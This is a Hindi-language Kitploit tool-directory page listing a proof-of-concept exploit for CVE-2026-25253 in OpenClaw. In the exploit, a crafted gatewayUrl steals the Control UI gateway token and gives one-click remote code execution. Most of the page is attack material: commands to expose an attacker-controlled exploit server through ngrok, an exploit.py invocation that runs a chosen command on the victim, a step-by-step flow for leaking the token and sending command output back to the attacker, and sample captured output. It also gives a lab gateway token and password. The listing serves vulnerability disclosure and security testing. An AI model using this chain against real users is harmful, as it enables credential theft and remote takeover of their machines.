Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-25253 — OpenClaw में CVE-2026-25253 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: एक तैयार किया गया gatewayUrl Control UI गेटवे टोकन को चोरी कर लेता है, जिससे अनधिकृत गेटवे एक्सेस और 1-क्लिक रिमोट कोड एक्ज़ीक्यूशन संभव हो जाता है। | Kitploit
उपकरण/GitHubGitHub/yym8538/cve-2026-25253
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंगरिमोट एक्सेस टूल
GitHubyym8538/cve-2026-25253

CVE-2026-25253

OpenClaw में CVE-2026-25253 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: एक तैयार किया गया gatewayUrl Control UI गेटवे टोकन को चोरी कर लेता है, जिससे अनधिकृत गेटवे एक्सेस और 1-क्लिक रिमोट कोड एक्ज़ीक्यूशन संभव हो जाता है।

141 महीना पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-25253 OpenClaw 1-Click RCE

★ CVE-2026-25253 OpenClaw 1-Click Remote Code Execution PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

विवरण

CVE-2026-25253 : OpenClaw प्रमाणीकरण टोकन चोरी की भेद्यता

विवरण: OpenClaw (जिसे clawdbot या Moltbot भी कहा जाता है) v2026.1.29 से पहले हमलावरों को Control UI में एक तैयार किया गया gatewayUrl क्वेरी-स्ट्रिंग मान प्रदान करके संग्रहीत गेटवे प्रमाणीकरण टोकन चुराने की अनुमति देता है, जो बिना किसी सत्यापन या उपयोगकर्ता पुष्टि के स्वचालित रूप से एक WebSocket कनेक्शन स्थापित करता है। यह अनधिकृत गेटवे पहुँच और 1-क्लिक रिमोट कोड निष्पादन का कारण बन सकता है।

आवश्यकताएँ

  • Docker (Windows पर Docker Desktop)
  • Python 3.x (हमले वाली ओर)

फ़ाइलें

  • Dockerfile — OpenClaw भेद्य वातावरण बनाएँ
  • templates/ — एक्सप्लॉइट द्वारा उपयोग किए जाने वाले दुर्भावनापूर्ण वेब पेज
  • config.txt — शिकार वातावरण में उपयोग किया जाने वाला OpenClaw कॉन्फ़िगरेशन
  • exploit.py — एक्सप्लॉइट सर्वर
  • requirements.txt — PoC निर्भरताएँ

वातावरण सेटअप

  1. Docker इमेज बनाएँ
docker build -t openclaw-vuln .
  1. वातावरण चलाएँ (Windows)
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. SSH टनल बनाएँ
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • पासवर्ड: openclawlab
  1. OpenClaw Control UI तक पहुँचें ब्राउज़र में निम्नलिखित URL खोलें
http://127.0.0.1:18789/
  1. Gateway Token d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 दर्ज करें
  2. Connect पर क्लिक करें
  3. Config टैब खोलें
  4. config.txt की सामग्री पेस्ट करें
  5. API key फ़ील्ड को अपनी OpenAI API key से बदलें
  6. कॉन्फ़िगरेशन सहेजें
  7. पुष्टि करें कि एजेंट सामान्य रूप से प्रतिक्रिया देता है

Proof of Concept (PoC)

  1. निर्भरताएँ इंस्टॉल करें (हमले वाली ओर)
pip3 install -r requirements.txt
  1. एक्सप्लॉइट सर्वर को HTTPS पर उजागर करें
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • उत्पन्न फ़ॉरवर्डिंग होस्टनाम कॉपी करें
  1. एक्सप्लॉइट सर्वर चलाएँ
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

उदाहरण:

python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. हमला ट्रिगर करें
  1. एक्सप्लॉइट सर्वर द्वारा उजागर किया गया दुर्भावनापूर्ण पेज खोलें
  2. पेज के साथ शिकार की अंतःक्रिया का अनुकरण करें
  3. ब्राउज़र से एक्सप्लॉइट प्रवाह ट्रिगर करें

हमला प्रवाह

  1. एक दुर्भावनापूर्ण URL शिकार के Control UI gatewayUrl को बदल देता है
  2. ब्राउज़र स्वचालित रूप से हमलावर-नियंत्रित WebSocket एंडपॉइंट से जुड़ जाता है
  3. गेटवे प्रमाणीकरण टोकन हमलावर को लीक हो जाता है
  4. दुर्भावनापूर्ण पेज चुराए गए टोकन का उपयोग करके शिकार के स्थानीय OpenClaw गेटवे से एक नया WebSocket कनेक्शन खोलता है
  5. एजेंट के माध्यम से एक कमांड निष्पादन अनुरोध भेजा जाता है
  6. निष्पादन परिणाम हमलावर सर्वर को वापस भेजा जाता है

अपेक्षित परिणाम

  • शिकार का ब्राउज़र दुर्भावनापूर्ण WebSocket प्रवाह में पुनर्निर्देशित हो जाता है
  • गेटवे प्रमाणीकरण टोकन हमलावर द्वारा कैप्चर कर लिया जाता है
  • हमलावर OpenClaw के माध्यम से एक कमांड निष्पादन अनुरोध भेज सकता है
  • कमांड आउटपुट हमलावर सर्वर को वापस भेजा जाता है

नमूना आउटपुट

[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

नोट्स

  • यह PoC OpenClaw 2026.1.24-1 को लक्षित करता है
  • एक्सप्लॉइट श्रृंखला Control UI में भेद्य gatewayUrl हैंडलिंग पर निर्भर करती है
  • दूरस्थ शिकार पहुँच के लिए, दुर्भावनापूर्ण पेज को HTTPS पर सर्व किया जाना चाहिए
  • स्थानीय OpenClaw गेटवे तक शिकार के ब्राउज़र के माध्यम से एक ब्रिज के रूप में पहुँचा जाता है

EQST Insight

हम महीने में एक बार CVE और मैलवेयर विश्लेषण प्रकाशित करते हैं। यदि आप रुचि रखते हैं, तो कृपया हमारे प्रकाशनों को देखने के लिए नीचे दिए गए लिंक का अनुसरण करें।

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
टूल डाउनलोड करें